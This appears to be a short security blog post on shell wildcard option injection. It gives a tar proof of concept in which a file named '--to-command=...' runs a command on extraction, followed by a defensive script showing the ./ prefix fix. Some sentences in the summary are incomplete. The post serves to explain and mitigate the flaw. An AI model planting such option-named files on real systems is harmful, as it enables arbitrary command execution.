Mon Dec 9 15:18:33 EET 2019

Shell wildcards considered dangerous?

A remote version of this affected wu-ftpd in 2003:

Summary:  For trusted command PROGRAM, executing
may lead to arbitrary code execution, e.g. for 

The main idea is to use the wildcard to inject program options: a file whose name starts with "-" is expanded by the shell and then parsed by the program as an option, not a filename.

Open problems:

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?

Example exploit vector: starting program in untrusted

$ rm -rf /tmp/1 ; mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : > --to-command="yes .tar"

# end of setup, the PoC starts here: *.tar expands to "--to-command=yes .tar a.tar"
$ tar xf *.tar

# output: .tar (repeats, printed by "yes" which tar ran for the extracted file)
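Added example, not from the original post: a small audit that shows what the unprefixed glob actually hands to a program and how a ./ prefix makes every expansion a filename again. The scratch directory and its filenames are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not part of the original post). Demonstrates the expansion
# behind "tar xf *.tar" and the ./ prefix that stops a filename being parsed
# as an option. All filenames below are constructed for the demonstration.
export LC_ALL=C   # fixed collation so "-" sorts before letters, as in the PoC

# Build a scratch directory: one ordinary archive name, one option-looking name.
make_scratch() {
  d=$(mktemp -d)
  : > "$d/a.tar"
  : > "$d/--to-command=yes .tar"   # constructed: same trick as the PoC above
  printf '%s' "$d"
}

# First word an unprefixed *.tar glob expands to inside directory $1.
first_glob_arg() {
  ( cd "$1" && set -- *.tar && printf '%s' "$1" )
}

# Same glob with a ./ prefix: every match begins with ./ and cannot be an option.
first_safe_glob_arg() {
  ( cd "$1" && set -- ./*.tar && printf '%s' "$1" )
}

# Number of glob matches a getopt-style parser would treat as options.
count_option_like() {
  ( cd "$1" && n=0
    for f in *.tar; do case "$f" in -*) n=$((n+1)) ;; esac; done
    printf '%s' "$n" )
}

# Usage: audit a directory before running "prog *.tar" inside it.
d=$(make_scratch)
printf 'unprefixed glob gives: %s\n' "$(first_glob_arg "$d")"
printf 'prefixed glob gives:   %s\n' "$(first_safe_glob_arg "$d")"
printf 'option-like names:     %s\n' "$(count_option_like "$d")"
rm -rf "$d"
```

Note that "--" is not a reliable fix for tar in old-style usage ("tar xf -- *.tar"), because "f" consumes the next word as the archive name; the ./ prefix works regardless of option syntax.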

Posted by wild